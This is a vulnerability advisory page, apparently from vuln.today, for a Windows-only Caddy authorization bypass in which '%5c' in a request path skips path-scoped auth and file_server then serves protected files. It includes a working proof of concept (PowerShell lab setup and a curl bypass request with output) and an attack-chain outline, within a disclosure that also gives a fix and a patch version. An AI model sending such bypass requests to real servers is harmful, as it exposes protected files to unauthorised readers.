Skip to main content

Caddy CVE-2026-52844

| EUVDEUVD-2026-38557 HIGH
Path Traversal (CWE-22)
2026-06-16 https://github.com/caddyserver/caddy GHSA-qrp7-cvwr-j2c6
7.5
CVSS 3.1 · Vendor: https://github.com/caddyserver/caddy
Share

Severity by source

Vendor (https://github.com/caddyserver/caddy) PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vuln.today AI
7.5 HIGH

Unauthenticated remote HTTP request bypasses path-based authorization on Windows with no user interaction; impact is confidential file disclosure only, no integrity or availability effect.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/caddyserver/caddy).

CVSS VectorVendor: https://github.com/caddyserver/caddy

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 16, 2026 - 23:22 vuln.today
Analysis Generated
Jun 16, 2026 - 23:22 vuln.today
CVE Published
Jun 16, 2026 - 21:28 github-advisory
HIGH 7.5

DescriptionCVE.org

Summary

On Windows, Caddy path matchers treat /private\secret.txt as outside /private/*, but file_server later resolves the same request path as private\secret.txt on disk.

An unauthenticated remote client can request /private%5csecret.txt and bypass Caddy path-scoped auth/deny routes protecting /private/*.

Details

The mismatch is between two Caddy code paths:

  • MatchPath.MatchWithError() compares r.URL.Path using URL path semantics and does not normalize \ to /: modules/caddyhttp/matchers.go:429, :436, :490, :532.
  • If the route matcher misses, Caddy skips that route: modules/caddyhttp/routes.go:271.
  • file_server then maps the same request path to a filesystem path with SanitizedPathJoin(root, r.URL.Path): modules/caddyhttp/fileserver/staticfiles.go:294, modules/caddyhttp/caddyhttp.go:257, :263.
  • On Windows, Go filesystem path handling treats \ as a separator, so the default filesystem opens the file under the protected directory: internal/filesystems/os.go:18.

This is related to, but distinct from, GHSA-4xrr-hq4w-6vf4 / CVE-2026-27585. That advisory fixed backslash handling in the file matcher / try_files glob path. This report does not use try_files or the file matcher; it affects ordinary path route matchers in front of direct file_server serving and reproduces on current HEAD.

PoC

Tested on current HEAD 6c675e29f87cbe7326983ddb6d739175119d394c with a Windows caddy.exe built from this repository.

On Windows, create the test files and Caddyfile:

powershell
$base = "C:\Users\Public\caddy-backslash-poc"
Remove-Item -Recurse -Force $base -ErrorAction SilentlyContinue
New-Item -ItemType Directory -Force "$base\www\private" | Out-Null
Set-Content -Path "$base\www\private\secret.txt" -Value "SECRET_FROM_WINDOWS_LAB" -NoNewline -Encoding ASCII

@'
{
	debug
	admin off
	auto_https off
}

:19080 {
	log
	root * C:\Users\Public\caddy-backslash-poc\www

	@private path /private/*
	respond @private 403

	file_server
}
'@ | Set-Content -Path "$base\Caddyfile" -Encoding ASCII

Start Caddy:

powershell
cd C:\Users\Public\caddy-backslash-poc
.\caddy.exe run --config Caddyfile --adapter caddyfile

Baseline request, expected to be blocked:

bash
curl -v --path-as-is http://<windows-host>:19080/private/secret.txt

Observed:

text
> GET /private/secret.txt HTTP/1.1
< HTTP/1.1 403 Forbidden

Bypass request:

bash
curl -v --path-as-is 'http://<windows-host>:19080/private%5csecret.txt'

Observed:

text
> GET /private%5csecret.txt HTTP/1.1
< HTTP/1.1 200 OK
< Content-Length: 23

SECRET_FROM_WINDOWS_LAB

Uppercase %5C produces the same result.

Relevant debug log lines:

json
{"msg":"using config from file","file":"C:\\Users\\Public\\caddy-backslash-poc\\Caddyfile"}
{"logger":"http.log","msg":"server running","name":"srv0","protocols":["h1","h2","h3"]}
{"logger":"http.log.access","request":{"method":"GET","uri":"/private/secret.txt"},"status":403}
{"logger":"http.log.access","request":{"method":"GET","uri":"/private%5csecret.txt"},"status":200}

Impact

This is a Windows-only remote authorization bypass for deployments that protect static subtrees with Caddy path matchers before file_server.

This pattern is documented by Caddy itself, for example basic_auth /secret/* { ... } followed by file_server.

An attacker can read files that were intended to be protected by Caddy-side basic_auth, respond 403, or other path-scoped handlers. The issue does not escape the configured site root; ..%5c traversal is still blocked. The practical impact is sensitive file disclosure inside the protected subtree, with higher impact if that subtree contains backups, database files, exported admin data, credentials, or signing/session secrets.

Suggested Fix

Normalize Windows path separators consistently before MatchPath evaluates request paths, or reject request paths containing \ before file_server resolves them as filesystem separators.

The important invariant is that a request path used for route authorization must not later resolve to a different protected filesystem path.

AI Disclosure

LLM assistance was used for codebase analysis and report drafting. The PoC was manually validated, including an end-to-end reproduction on a Windows Server lab host using a Windows caddy.exe built from current HEAD.

AnalysisAI

Authorization bypass in Caddy web server on Windows allows unauthenticated remote attackers to access files in path-protected directories by substituting forward slashes with URL-encoded backslashes (%5C). The flaw stems from an inconsistency between Caddy's path matcher and file_server handler, where the matcher treats \ as a literal character while Windows-native filesystem code treats it as a separator. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify Windows-hosted Caddy site with path-scoped auth
Delivery
Enumerate likely protected paths (/private/, /admin/, /secret/)
Exploit
Send GET request with %5C replacing the slash after the protected prefix
Execution
Path matcher fails to match, protective route is skipped
Persist
file_server resolves backslash as Windows separator
Impact
Read sensitive file contents from protected subtree

Vulnerability AssessmentAI

Exploitation Requires the Caddy server to be running on Windows (the bypass depends on Go's Windows `os` filesystem treating `\` as a path separator), and the deployment must use a Caddy `path` matcher (e.g., `@private path /private/*`, or the equivalent `basic_auth /secret/*` form) as the authorization gate in front of a `file_server` directive serving the protected subtree. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) accurately reflects an unauthenticated network-reachable confidentiality bypass with no integrity or availability impact, consistent with read-only static-file disclosure. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies a Windows-hosted Caddy site whose configuration protects `/private/*`, `/admin/*`, or similar subtrees with `basic_auth`, `respond 403`, or other path-scoped handlers in front of `file_server`. They issue `GET /private%5csecret.txt` (or any other protected file with the first `/` after the prefix replaced by `%5c`), which fails the URL-semantic path match but is later resolved against the Windows filesystem with `\` as a separator. …
Remediation Vendor-released patch: upgrade Caddy v2 to 2.11.4 or later, which normalizes Windows path separators consistently before path-matcher evaluation (https://github.com/caddyserver/caddy/security/advisories/GHSA-qrp7-cvwr-j2c6). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Audit all Windows infrastructure running Caddy to identify affected installations and catalog protected directories. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-52844 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy